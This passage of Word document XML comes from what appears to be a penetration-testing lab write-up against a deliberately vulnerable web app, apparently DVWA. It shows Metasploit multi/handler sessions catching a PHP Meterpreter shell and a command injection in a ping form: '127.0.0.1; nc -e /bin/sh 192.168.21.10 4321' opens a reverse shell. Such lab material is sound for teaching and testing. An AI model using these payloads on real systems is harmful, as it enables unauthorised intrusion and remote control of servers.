      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B863AD" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRPr="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00C40B33">
        <w:t>[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D4C987" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRPr="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00C40B33">
        <w:t>[-] No arch selected, selecting arch: php from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44062D" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRPr="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00C40B33">
        <w:t>No encoder or badchars specified, outputting raw payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CA9679" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00C40B33">
        <w:t>Payload size: 30304 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1710CA84" w14:textId="77777777" w:rsidR="003B003E" w:rsidRDefault="003B003E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328E346C" w14:textId="7F1656E7" w:rsidR="00981DA3" w:rsidRDefault="00216AA3" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start a listener on Metasploit, using the same multi/handler exploit </w:t>
      </w:r>
      <w:r w:rsidR="006E17AD">
        <w:t>than</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before, but with a different payload</w:t>
      </w:r>
      <w:r w:rsidR="00981DA3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702F9A6E" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; set PAYLOAD php/meterpreter_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44719C" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PAYLOAD =&gt; php/meterpreter_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C74D0D" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E3F4C3" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3931E596" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module options (exploit/multi/handler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A417200" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BBF40EB" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name  Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032A45D3" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----  ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C569F3" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B7E4EE5" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A579D3" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Payload options (php/meterpreter_reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F91FC" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BD02D9C" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C72BB4B" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588835BD" w14:textId="167B6358" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LHOST  </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C82797C" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LPORT  1234             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347B847B" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01963509" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7D3F48" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F1A305" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E07D18F" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFF0D27" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA85F78" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   0   Wildcard Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09635151" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42335848" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46CEA36A" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; set LPORT 4321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005FEA82" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LPORT =&gt; 4321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB43E43" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC583A7" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771AC0B7" w14:textId="698D9DCC" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t>:4321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FDCDCC" w14:textId="77777777" w:rsidR="003B003E" w:rsidRDefault="003B003E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EDCF97D" w14:textId="6276CF5B" w:rsidR="00981DA3" w:rsidRDefault="000140B5" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Upload the previously generated shell </w:t>
      </w:r>
      <w:r w:rsidR="00981DA3">
        <w:t>an</w:t>
      </w:r>
      <w:r w:rsidR="00A75F80">
        <w:t>d brows</w:t>
      </w:r>
      <w:r w:rsidR="00C40B33">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00970A70">
        <w:t xml:space="preserve"> the URL</w:t>
      </w:r>
      <w:r w:rsidR="00287129">
        <w:t xml:space="preserve"> to connect back to </w:t>
      </w:r>
      <w:r w:rsidR="00A75F80">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00981DA3">
        <w:t>et</w:t>
      </w:r>
      <w:r w:rsidR="00287129">
        <w:t>asploit</w:t>
      </w:r>
      <w:r w:rsidR="00981DA3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A26D8A" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5103D3" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380C9470" w14:textId="7DCCAA9B" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:4321 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A75DE9" w14:textId="2C754A1B" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Meterpreter session 6 opened (</w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:4321 -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>192.168.1.10</w:t>
      </w:r>
      <w:r>
        <w:t>:56642) at 2018-06-27 14:43:56 +0200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CA8997" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450D2672" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; getuid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2488ACEC" w14:textId="77777777" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Server username: www-data (33)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9EECD8" w14:textId="2A5E947B" w:rsidR="00C40B33" w:rsidRDefault="00C40B33" w:rsidP="00C40B33">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200500EC" w14:textId="77777777" w:rsidR="003B003E" w:rsidRDefault="003B003E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606E5C87" w14:textId="63F60D6F" w:rsidR="00B66CFF" w:rsidRPr="00681E35" w:rsidRDefault="00B66CFF" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Again, privileges escalation is required to get root access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9C01E4" w14:textId="021B09BE" w:rsidR="00C613A8" w:rsidRDefault="00C613A8" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Ping service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62516A74" w14:textId="0584C9E9" w:rsidR="006C1163" w:rsidRDefault="006C1163" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The ping service is a simple form requesting for an IP address, pinging it and returning the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242B34E" w14:textId="68D0606E" w:rsidR="006C1163" w:rsidRPr="006C1163" w:rsidRDefault="006C1163" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="00CABB43" wp14:editId="3952B7B3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-2318</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2763327" cy="2263620"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="228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vwa-ping-servic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3327" cy="2263620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="bg1">
                          <a:lumMod val="65000"/>
                        </a:schemeClr>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76930E7B" w14:textId="711F184B" w:rsidR="00C613A8" w:rsidRDefault="00981DA3" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Using netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CD72F3" w14:textId="2FBBE225" w:rsidR="00153FFD" w:rsidRDefault="00431BF1" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This ping service allows the user to execute command (using the ‘;’ </w:t>
      </w:r>
      <w:r w:rsidR="00BA796E">
        <w:t>character, which</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is not filtered</w:t>
      </w:r>
      <w:r w:rsidR="00EB62A8">
        <w:t xml:space="preserve"> followed by a command</w:t>
      </w:r>
      <w:r w:rsidR="00B34A44">
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidR="00002BEB">
        <w:t xml:space="preserve"> With still the same handler and the right payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B1AEB6" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">msf exploit(multi/handler) &gt; set PAYLOAD linux/x86/shell_reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B885055" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PAYLOAD =&gt; linux/x86/shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377ED360" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177FE584" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2094B20D" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Module options (exploit/multi/handler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037F5FF0" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48902B0A" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name  Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD008F4" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----  ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F46F2E" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C59F8D4" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72AB8A92" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Payload options (linux/x86/shell_reverse_tcp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EFEDAA" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447D5884" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B99DEA" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   ----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EBEB4E" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   CMD    /bin/sh          yes       The command string to execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AEEC3F" w14:textId="04DF87A1" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LHOST  </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    yes       The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AA0FB8" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   LPORT  4321             yes       The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F29CFB9" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4212C9CB" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65D44590" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7D96D5" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1023F9" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5240E2F2" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   --  ----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4F2F70" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   0   Wildcard Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDBA724" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA7E68C" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="634453DC" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msf exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F52184E" w14:textId="77777777" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC5E637" w14:textId="02F950EE" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r>
        <w:t>:4321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F280C56" w14:textId="77777777" w:rsidR="003B003E" w:rsidRDefault="003B003E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DD6987E" w14:textId="2BAC6193" w:rsidR="00002BEB" w:rsidRDefault="006D280E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On the server, the following code is </w:t>
      </w:r>
      <w:r w:rsidR="00EB62A8">
        <w:t>entered in the IP field</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F5962" w14:textId="4106EEDA" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="00EB62A8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB62A8">
        <w:t xml:space="preserve">127.0.0.1; nc -e /bin/sh </w:t>
      </w:r>
      <w:r w:rsidR="003224D5">
        <w:t>192.168.21.10</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB62A8">
        <w:t xml:space="preserve"> 4321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF87C83" w14:textId="77777777" w:rsidR="003B003E" w:rsidRDefault="003B003E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB64474" w14:textId="69A2F0B0" w:rsidR="00EB62A8" w:rsidRDefault="00EB62A8" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>This connects back to Metasploit and we have our shell (which can be used to spawn an interactive one).</w:t>
      </w:r>
    </w:p>
